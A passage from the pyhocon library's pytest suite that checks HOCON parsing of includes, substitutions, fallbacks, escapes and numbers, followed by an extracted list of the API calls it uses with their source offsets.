a: {{
include "{tmp_file}"
c: 3
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config1['a'] == expected_res
config2 = ConfigFactory.parse_string(
"""
a: {{
c: 3
d: 4
include "{tmp_file}"
}}
""".format(tmp_file=fdin.name)
)
assert config2['a'] == expected_res
config3 = ConfigFactory.parse_string(
"""
a: {{
c: 3
include "{tmp_file}"
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config3['a'] == expected_res
def test_include_substitution(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('y = ${x}')
fdin.flush()
config = ConfigFactory.parse_string(
"""
include "{tmp_file}"
x = 42
""".format(tmp_file=fdin.name)
)
assert config['x'] == 42
assert config['y'] == 42
@pytest.mark.xfail
def test_include_substitution2(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{ x : 10, y : ${x} }')
fdin.flush()
config = ConfigFactory.parse_string(
"""
{
a : { include """ + '"' + fdin.name + """" }
a : { x : 42 }
}
"""
)
assert config['a']['x'] == 42
assert config['a']['y'] == 42
def test_var_with_include_keyword(self):
config = ConfigFactory.parse_string(
"""
include-database=true
""")
assert config == {
'include-database': True
}
def test_substitution_override(self):
config = ConfigFactory.parse_string(
"""
database {
host = localhost
port = 5432
user = people
name = peopledb
pass = <PASSWORD>
}
user=test_user
pass=<PASSWORD>
database {
user = ${user}
pass = ${pass}
}
""")
assert config['database.user'] == 'test_user'
assert config['database.pass'] == '<PASSWORD>'
def test_substitution_flat_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = <PASSWORD>
name = ${?NOT_EXISTS}
pass = ${?NOT_EXISTS}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == '<PASSWORD>'
def test_substitution_multiple_override(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: foo
c: ${a} ${b}
c: ${b} ${a}
d: ${a} ${b}
d: ${a} bar
""")
assert config['c'] == 'foo 1'
assert config['d'] == '1 bar'
def test_substitution_nested_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = <PASSWORD>
}
database {
name = ${?user}
pass = ${?pass}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == '<PASSWORD>'
def test_optional_with_merge(self):
unresolved = ConfigFactory.parse_string(
"""
foo: 42
foo: ${?a}
""", resolve=False)
source = ConfigFactory.parse_string(
"""
b: 14
""")
config = unresolved.with_fallback(source)
assert config['foo'] == 42
config = source.with_fallback(unresolved)
assert config['foo'] == 42
def test_fallback_with_resolve(self):
config3 = ConfigFactory.parse_string("c=5")
config2 = ConfigFactory.parse_string("b=${c}", resolve=False)
config1 = ConfigFactory.parse_string("a=${b}", resolve=False) \
.with_fallback(config2, resolve=False) \
.with_fallback(config3)
assert {'a': 5, 'b': 5, 'c': 5} == config1
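    # ${?path} is an optional substitution: an undefined target drops the field, and
    # inside a concatenation the missing part simply disappears.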
def test_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
a = 45
b = ${?c}
d = ${?c} 4
e = ${?a}
g = ${?c1} ${?c2}
h = ${?c1} ${?c2} 1
""")
assert 'b' not in config
assert config['d'] == 4
assert config['e'] == 45
assert 'g' not in config
assert config['h'] == 1
def test_cascade_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
num = 3
retries_msg = You have ${num} retries
retries_msg = ${?CUSTOM_MSG}
""")
assert config == {
'num': 3,
'retries_msg': 'You have 3 retries'
}
def test_substitution_cycle(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
a = ${b}
b = ${c}
c = ${a}
""")
def test_assign_number_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
4
b = # test
# test2
5
c =
6
"""
)
assert config['a'] == 4
assert config['b'] == 5
assert config['c'] == 6
def test_assign_int(self):
config = ConfigFactory.parse_string(
"""
short = 12
long = 12321321837612378126213217321
negative = -15
"""
)
        # on python 3 long will be an int but on python 2 long will be a long
assert config['short'] == 12
assert isinstance(config['short'], int)
assert config['long'] == 12321321837612378126213217321
assert isinstance(config['negative'], int)
assert config['negative'] == -15
def test_assign_float(self):
config = ConfigFactory.parse_string(
"""
a = 121.22
b = -121.22
c = .54
d = -.54
"""
)
        # on python 3 long will be an int but on python 2 long will be a long
assert config['a'] == 121.22
assert config['b'] == -121.22
assert config['c'] == .54
assert config['d'] == -.54
def test_sci_real(self):
"""
        Test scientific notation for numbers
"""
config = ConfigFactory.parse_string(
"""
short = 12.12321
long1 = 121.22E3423432
neg_long1 = 121.22E-1
long2 = 121.22e3423432
neg_long2 = 121.22e-3
"""
)
        # on python 3 long will be an int but on python 2 long will be a long
assert config['short'] == 12.12321
assert config['long1'] == 121.22E3423432
assert config['neg_long1'] == 121.22E-1
assert config['long2'] == 121.22E3423432
assert config['neg_long2'] == 121.22E-3
def test_assign_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
"a"
b = # test
# test2
"b"
c =
"c"
"""
)
assert config['a'] == 'a'
assert config['b'] == 'b'
assert config['c'] == 'c'
def test_assign_list_numbers_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
1,
2,
]
b = # test
# test2
[
3,
4,]
c =
[
5,
6
]
"""
)
assert config['a'] == [1, 2]
assert config['b'] == [3, 4]
assert config['c'] == [5, 6]
def test_assign_list_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
"a",
"b",
]
b = # test
# test2
[
"c",
"d",]
c =
[
"e",
"f"
]
"""
)
assert config['a'] == ['a', 'b']
assert config['b'] == ['c', 'd']
assert config['c'] == ['e', 'f']
def test_assign_dict_strings_with_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
{
a: 1,
b: 2,
}
b = # test
# test2
{
c: 3,
d: 4,}
c =
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_assign_dict_strings_no_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a
{
a: 1,
b: 2,
}
b # test
# test2
{
c: 3,
d: 4,}
c
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = 123
a = ${?test}
a = 5
"""
)
assert config1['a'] == 5
config2 = ConfigFactory.parse_string(
"""
{
database {
host = "localhost"
port = 8000
url = ${database.host}":"${database.port}
}
database {
host = ${?DB_HOST}
}
database {
host = "other.host.net"
port = 433
}
}
"""
)
assert config2['database']['host'] == 'other.host.net'
assert config2['database']['port'] == 433
assert config2['database']['url'] == 'other.host.net:433'
def test_fallback_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = {
b: 1
c: 2
}
"""
)
config2 = ConfigFactory.parse_string(
"""
a.b = 4
a.d = 3
"""
)
config3 = config1.with_fallback(config2)
assert config3['a'] == {
'b': 1,
'c': 2,
'd': 3
}
config4 = ConfigFactory.parse_string(
"""
name: foo
"""
)
config5 = ConfigFactory.parse_string(
u"""
longName: "long "${?name}
""",
resolve=False
)
config6 = config4.with_fallback(config5)
assert config6 == {
'longName': 'long foo',
'name': 'foo'
}
def test_fallback_substitutions_overwrite_file(self):
config1 = ConfigFactory.parse_string(
"""
{
data-center-generic = { cluster-size: 8 }
misc = "mist"
}
"""
)
# use unicode path here for regression testing https://github.com/chimpler/pyhocon/issues/44
config2 = config1.with_fallback(u'samples/aws.conf')
assert config2 == {
'data-center-generic': {'cluster-size': 8},
'data-center-east': {'cluster-size': 8, 'name': 'east'},
'misc': 'mist',
'default-jvm-opts': ['-XX:+UseParNewGC'],
'large-jvm-opts': ['-XX:+UseParNewGC', '-Xm16g']
}
def test_fallback_self_ref_substitutions_append(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list = ${list} [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_fallback_self_ref_substitutions_append_plus_equals(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list += [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_self_merge_ref_substitutions_object(self):
config1 = ConfigFactory.parse_string(
"""
a : { }
b : 1
c : ${a} { d : [ ${b} ] }
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("c.d") == [1]
def test_self_merge_ref_substitutions_object2(self):
config1 = ConfigFactory.parse_string(
"""
x : { v1: 1 }
b1 : {v2: 2 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b2 : ${x} {v2: 3}
b += [${b2}]
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
b = merged.get("b")
assert len(b) == 2
assert b[0] == {'v2': 2}
assert b[1] == {'v1': 1, 'v2': 3}
def test_self_merge_ref_substitutions_object3(self):
config1 = ConfigFactory.parse_string(
"""
b1 : { v1: 1 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b1 : { v1: 2, v2: 3 }
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("b1") == {"v1": 2, "v2": 3}
b = merged.get("b")
assert len(b) == 1
assert b[0] == {"v1": 2, "v2": 3}
def test_fallback_self_ref_substitutions_merge(self):
config1 = ConfigFactory.parse_string(
"""
dict = { x: 1 }
"""
)
config2 = ConfigFactory.parse_string(
"""
dict = ${dict} { y: 2 }
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("dict") == {'x': 1, 'y': 2}
def test_fallback_self_ref_substitutions_concat_string(self):
config1 = ConfigFactory.parse_string(
"""
string = abc
"""
)
config2 = ConfigFactory.parse_string(
"""
string = ${string}def
""",
resolve=False
)
result = config2.with_fallback(config1)
assert result.get("string") == 'abcdef'
# test no mutation on config1
assert result is not config1
# test no mutation on config2
assert "abc" not in str(config2)
def test_fallback_non_root(self):
root = ConfigFactory.parse_string(
"""
a = 1
mid.b = 1
"""
)
config = root.get_config("mid").with_fallback(root)
assert config['a'] == 1 and config['b'] == 1
def test_object_field_substitution(self):
config = ConfigFactory.parse_string(
"""
A = ${Test}
Test {
field1 = 1
field2 = ${Test.field1}"2"
field3 = ${Test.field2}"3"
}
"""
)
assert config.get_string("A.field1") == "1"
assert config.get_string("A.field2") == "12"
assert config.get_string("A.field3") == "123"
assert config.get_string("Test.field1") == "1"
assert config.get_string("Test.field2") == "12"
assert config.get_string("Test.field3") == "123"
def test_one_line_quote_escape(self):
config = ConfigFactory.parse_string(
"""
test_no_quotes: abc\\n\\n
test_quotes: "abc\\n\\n"
"""
)
assert config == {
'test_no_quotes': 'abc\n\n',
'test_quotes': 'abc\n\n'
}
def test_multi_line_escape(self):
config = ConfigFactory.parse_string(
"""
with-escaped-backslash: \"\"\"
\\\\
\"\"\"
with-newline-escape-sequence: \"\"\"
\\n
\"\"\"
with-escaped-newline-escape-sequence: \"\"\"
\\\\n
\"\"\"
"""
)
assert config['with-escaped-backslash'] == '\n\\\\\n'
assert config['with-newline-escape-sequence'] == '\n\\n\n'
assert config['with-escaped-newline-escape-sequence'] == '\n\\\\n\n'
def test_multiline_with_backslash(self):
config = ConfigFactory.parse_string(
"""
test = line1 \
line2
test2 = test
""")
assert config == {
'test': 'line1 line2',
'test2': 'test'
}
def test_from_dict_with_dict(self):
d = {
'banana': 3,
'apple': 4,
'pear': 1,
'orange': 2,
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_ordered_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['orange'] = 2
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_nested_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['tree'] = {
'a': 'abc\ntest\n',
'b': [1, 2, 3]
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_object_concat(self):
config = ConfigFactory.parse_string(
"""o1 = {
foo : {
a : 1
b : 2
}
}
o2 = {
foo : {
b : 3
c : 4
}
}
o3 = ${o1} ${o2}
"""
)
assert config.get_int('o1.foo.b') == 2
assert config.get_int('o2.foo.b') == 3
assert config.get_int('o3.foo.b') == 3
assert config.get_int('o1.foo.c', default=42) == 42
assert config.get_int('o3.foo.a') == 1
assert config.get_int('o3.foo.c') == 4
def test_issue_75(self):
config = ConfigFactory.parse_string(
"""base : {
bar: ["a"]
}
sub : ${base} {
baz: ${base.bar} ["b"]
}
sub2: ${sub}
"""
)
assert config.get_list('base.bar') == ["a"]
assert config.get_list('sub.baz') == ["a", "b"]
assert config.get_list('sub2.baz') == ["a", "b"]
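    # as_plain_ordered_dict() cannot serialise a tree that still holds unresolved
    # substitutions, so parsing with resolve=False must raise ConfigException here.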
def test_plain_ordered_dict(self):
config = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
with pytest.raises(ConfigException):
config.as_plain_ordered_dict()
def test_quoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
no_trailing_ws = "foo" "bar "
trailing_ws = "foo" "bar "{ws}
trailing_ws_with_comment = "foo" "bar "{ws}// comment
""".format(ws=' '))
assert config == {
'no_trailing_ws': "foo bar ",
'trailing_ws': "foo bar ",
'trailing_ws_with_comment': "foo bar "
}
def test_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo bar
""")
assert config == {
'a': 'foo bar'
}
def test_quoted_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo "bar" dummy
""")
assert config == {
'a': 'foo bar dummy'
}
def test_quoted_unquoted_strings_with_ws_substitutions(self):
config = ConfigFactory.parse_string(
"""
x = 5
b = test
a = foo "bar" ${b} dummy
c = foo ${x} bv
d = foo ${x} 43
""")
assert config == {
'x': 5,
'b': 'test',
'a': 'foo bar test dummy',
'c': 'foo 5 bv',
'd': 'foo 5 43'
}
def test_complex_substitutions(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: ${c} {
pa: [${a}]
pb: ${b.pa}
}
c: { }
d: { pc: ${b.pa} }
e: ${b}
""", resolve=True)
assert config == {
'a': 1,
'b': {'pa': [1], 'pb': [1]},
'c': {},
'd': {'pc': [1]},
'e': {'pa': [1], 'pb': [1]}
}
def test_assign_next_line(self):
config = ConfigFactory.parse_string(
"""
a = // abc
abc
c =
5
""")
assert config == {
'a': 'abc',
'c': 5
}
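    # The tests below inject variables via mock.patch.dict; an otherwise undefined
    # ${VAR} falls back to the environment and always arrives as a string, hence the
    # explicit get_bool()/get_int() conversions.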
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment(self):
config = ConfigFactory.parse_string(
"""
string_from_env = ${STRING_VAR}
""")
assert config == {
'string_from_env': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref_optional(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${?STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, TRUE_OR_FALSE='false')
def test_bool_from_environment(self):
config = ConfigFactory.parse_string(
"""
bool_from_env = ${TRUE_OR_FALSE}
""")
assert config == {
'bool_from_env': 'false'
}
assert config.get_bool('bool_from_env') is False
@mock.patch.dict(os.environ, INT_VAR='5')
def test_int_from_environment(self):
config = ConfigFactory.parse_string(
"""
int_from_env = ${INT_VAR}
""")
assert config == {
'int_from_env': '5'
}
assert config.get_int('int_from_env') == 5
def test_unicode_dict_key(self):
input_string = u"""
www.sample.com {
us {
name = "first domain"
}
}
www.example-ö.com {
us {
name = "second domain"
}
}
"""
config = ConfigFactory.parse_string(input_string)
assert config.get_string(u'www.sample.com.us.name') == 'first domain'
assert config.get_string(u'www.example-ö.com.us.name') == 'second domain'
with pytest.raises(ConfigWrongTypeException):
config.put(u'www.example-ö', 'append_failure', append=True)
with pytest.raises(ConfigMissingException):
config.get_string(u'missing_unicode_key_ö')
with pytest.raises(ConfigException):
config.get_bool(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_list(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_config(u'www.example-ö.com.us.name')
with pytest.raises(ConfigWrongTypeException):
config.get_string(u'www.example-ö.com.us.name.missing')
def test_with_comment_on_last_line(self):
        # Address issue #102
config_tree = ConfigFactory.parse_string("""
foo: "1"
bar: "2"
# DO NOT CHANGE ANY OF THE ABOVE SETTINGS!""")
assert config_tree == {
'foo': '1',
'bar': '2'
}
def test_triple_quotes_same_line(self):
config_tree = ConfigFactory.parse_string('a:["""foo"""", "bar"]')
assert config_tree == {
'a': ['foo"', "bar"]
}
def test_pop(self):
config_tree = ConfigFactory.parse_string('a:{b: 3, d: 6}')
assert 3 == config_tree.pop('a.b', 5)
assert 5 == config_tree.pop('a.c', 5)
expected = {
'a': {'d': 6}
}
assert expected == config_tree
def test_merge_overriden(self):
        # Address issue #110
# ConfigValues must merge with its .overriden_value
# if both are ConfigTree
config_tree = ConfigFactory.parse_string("""
foo: ${bar}
foo: ${baz}
bar: {r: 1, s: 2}
baz: {s: 3, t: 4}
""")
assert 'r' in config_tree['foo'] and 't' in config_tree['foo'] and config_tree['foo']['s'] == 3
def test_attr_syntax(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: {
pb: 5
}
""")
assert 5 == config.b.pb
def test_escape_quote(self):
config = ConfigFactory.parse_string(
"""
quoted: "abc\\"test"
unquoted: abc\\"test
""")
assert 'abc"test' == config['quoted']
assert 'abc"test' == config['unquoted']
def test_escape_quote_complex(self):
config = ConfigFactory.parse_string(
"""
value: "{\\"critical\\":\\"0.00\\",\\"warning\\":\\"99.99\\"}"
"""
)
assert '{"critical":"0.00","warning":"99.99"}' == config['value']
def test_keys_with_slash(self):
config = ConfigFactory.parse_string(
"""
/abc/cde1: abc
"/abc/cde2": "cde"
/abc/cde3: "fgh"
""")
assert 'abc' == config['/abc/cde1']
assert 'cde' == config['/abc/cde2']
assert 'fgh' == config['/abc/cde3']
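    # Regression check: resolving the shared ${compilerCommon} ${substrate-suite}
    # concatenations must not mutate the underlying trees, so each merged entry
    # ends up with VAR = "right".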
def test_mutation_values(self):
config = ConfigFactory.parse_string(
"""
common : {
}
b1 = []
var = "wrong"
compilerCommon : ${common} {
VAR : ${var}
}
substrate-suite: {
VAR : "right"
}
b1 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
b2 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
""")
assert config.get("b1")[1]['VAR'] == 'right'
assert config.get("b2")[1]['VAR'] == 'right'
def test_escape_sequences_json_equivalence(self):
"""
Quoted strings are in the same format as JSON strings,
See: https://github.com/lightbend/config/blob/master/HOCON.md#unchanged-from-json
"""
source = r"""
{
"plain-backslash": "\\",
"tab": "\t",
"no-tab": "\\t",
"newline": "\n",
"no-newline": "\\n",
"cr": "\r",
"no-cr": "\\r",
"windows": "c:\\temp"
}
"""
expected = {
'plain-backslash': '\\',
'tab': '\t',
'no-tab': '\\t',
'newline': '\n',
'no-newline': '\\n',
'cr': '\r',
'no-cr': '\\r',
'windows': 'c:\\temp',
}
config = ConfigFactory.parse_string(source)
assert config == expected
assert config == json.loads(source)
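# The duration cases below are defined at module level and only registered when
# python-dateutil is importable; unknown units such as "mon" stay plain strings.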
try:
    from dateutil.relativedelta import relativedelta
    @pytest.mark.parametrize('data_set', [
        ('a: 1 months', relativedelta(months=1)),
        ('a: 1months', relativedelta(months=1)),
        ('a: 2 month', relativedelta(months=2)),
        ('a: 3 mo', relativedelta(months=3)),
        ('a: 3mo', relativedelta(months=3)),
        ('a: 3 mon', '3 mon'),
        ('a: 1 years', relativedelta(years=1)),
        ('a: 1years', relativedelta(years=1)),
        ('a: 2 year', relativedelta(years=2)),
        ('a: 3 y', relativedelta(years=3)),
        ('a: 3y', relativedelta(years=3)),
    ])
    def test_parse_string_with_duration_optional_units(data_set):
        config = ConfigFactory.parse_string(data_set[0])
        assert config['a'] == data_set[1]
except Exception:
    pass
| [
"mock.patch.dict",
"pyhocon.ConfigParser.resolve_package_path",
"dateutil.relativedelta.relativedelta",
"pyhocon.ConfigTree.merge_configs",
"datetime.timedelta",
"pyhocon.ConfigParser.resolve_substitutions",
"os.path.exists",
"os.mkdir",
"tempfile.NamedTemporaryFile",
"collections.OrderedDict",
"json.loads",
"pyhocon.ConfigFactory.parse_file",
"pyhocon.ConfigFactory.parse_string",
"tempfile.mkdtemp",
"pytest.raises",
"pyhocon.ConfigFactory.parse_URL",
"os.path.join",
"pytest.mark.parametrize",
"shutil.rmtree",
"pyhocon.ConfigFactory.from_dict"
] | [((2066, 2153), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', "['+', '`', '^', '?', '!', '@', '*', '&']"], {}), "('forbidden_char', ['+', '`', '^', '?', '!', '@',\n '*', '&'])\n", (2089, 2153), False, 'import pytest\n'), ((2350, 2403), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', '[\'$\', \'"\']'], {}), '(\'forbidden_char\', [\'$\', \'"\'])\n', (2373, 2403), False, 'import pytest\n'), ((2611, 2698), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', "['+', '`', '^', '?', '!', '@', '*', '&']"], {}), "('forbidden_char', ['+', '`', '^', '?', '!', '@',\n '*', '&'])\n", (2634, 2698), False, 'import pytest\n'), ((62337, 62401), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (62352, 62401), False, 'import mock\n'), ((62667, 62731), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (62682, 62731), False, 'import mock\n'), ((62996, 63060), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (63011, 63060), False, 'import mock\n'), ((63335, 63385), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'TRUE_OR_FALSE': '"""false"""'}), "(os.environ, TRUE_OR_FALSE='false')\n", (63350, 63385), False, 'import mock\n'), ((63688, 63728), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'INT_VAR': '"""5"""'}), "(os.environ, INT_VAR='5')\n", (63703, 63728), False, 'import mock\n'), ((696, 1177), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""t = {\n c = 5\n "d" = true\n e.y = {\n f: 7\n g: "hey dude!"\n h: hey man\n i = ""\\"\n "first line"\n "second" line\n ""\\"\n }\n j = [1, 2, 3]\n u = 192.168.1.3/32\n g = null\n }\n """'], {}), '(\n """t = {\n c = 5\n "d" = true\n e.y = {\n f: 7\n g: "hey dude!"\n h: hey man\n i = ""\\"\n "first line"\n "second" line\n ""\\"\n }\n j = [1, 2, 3]\n u = 192.168.1.3/32\n g = null\n }\n """\n )\n', (722, 1177), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((2997, 3146), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: 5\n }\n }\n """'], {}), '(\n """\n {\n a: {\n b: 5\n }\n }\n """\n )\n', (3023, 3146), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5001, 5040), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['data_set[0]'], {}), '(data_set[0])\n', (5027, 5040), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5169, 5288), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: foo\n b: 10 weeks\n c: bar\n """'], {}), '(\n """\n a: foo\n b: 10 weeks\n c: bar\n """\n )\n', (5195, 5288), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5448, 5587), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: foo\n b: [a, 1, 10 weeks, 5 minutes,]\n c: bar\n """'], {}), '(\n """\n a: foo\n b: [a, 1, 10 weeks, 5 minutes,]\n c: bar\n """\n )\n', (5474, 5587), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5750, 5789), 
'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""[1, 2, 3]"""'], {}), "('[1, 2, 3]')\n", (5776, 5789), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5884, 6113), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n "a.b.c.d": 3\n t {\n "d": {\n "c": 5\n }\n }\n k {\n "b.f.d": 7\n }\n """'], {}), '(\n """\n "a.b.c.d": 3\n t {\n "d": {\n "c": 5\n }\n }\n k {\n "b.f.d": 7\n }\n """\n )\n', (5910, 6113), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((6302, 6493), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n b = foo\n c = bar\n }\n a.c = ${a.b}" "${a.b}\n a.d = baz\n """'], {}), '(\n """\n a {\n b = foo\n c = bar\n }\n a.c = ${a.b}" "${a.b}\n a.d = baz\n """\n )\n', (6328, 6493), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((6685, 6906), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a=1,\n b="abc",\n c=the man,\n d=woof,\n a-b-c-d=test,\n a b c d=test2,\n "a b c d e"=test3\n """'], {}), '(\n """\n a=1,\n b="abc",\n c=the man,\n d=woof,\n a-b-c-d=test,\n a b c d=test2,\n "a b c d e"=test3\n """\n )\n', (6711, 6906), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((7274, 7784), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n d {\n g.h.j.u: 5\n g {\n h.d: 4\n }\n g.h.k: f d\n }\n\n h.i.m = 7\n h.i {\n d: 5\n }\n\n h.i {\n e:65\n }\n }\n """'], {}), '(\n """\n a {\n d {\n g.h.j.u: 5\n g {\n h.d: 4\n }\n g.h.k: f d\n }\n\n h.i.m = 7\n h.i {\n d: 5\n }\n\n h.i {\n e:65\n }\n }\n """\n )\n', (7300, 7784), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((8473, 9026), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n // comment 1\n # comment 2\n {\n c = test // comment 0\n g = 6 test # comment 0\n # comment 3\n a: { # comment 4\n b: test, # comment 5\n } # comment 6\n t = [1, # comment 7\n 2, # comment 8\n 3, # comment 9\n ]\n } # comment 10\n // comment 11\n // comment 12\n """'], {}), '(\n """\n // comment 1\n # comment 2\n {\n c = test // comment 0\n g = 6 test # comment 0\n # comment 3\n a: { # comment 4\n b: test, # comment 5\n } # comment 6\n t = [1, # comment 7\n 2, # comment 8\n 3, # comment 9\n ]\n } # comment 10\n // comment 11\n // comment 12\n """\n )\n', (8499, 9026), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9314, 9379), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 5\n """'], {}), '("""\n a = 5\n """)\n', (9340, 9379), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9581, 9677), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = null\n b = [null]\n """'], {}), '(\n """\n a = null\n b = [null]\n """)\n', (9607, 9677), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9829, 10122), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n a.b {\n c = 7\n d = 8\n }\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n a.b {\n c = 7\n d = 8\n }\n }\n """\n )\n', (9855, 10122), False, 'from pyhocon import ConfigFactory, ConfigParser, 
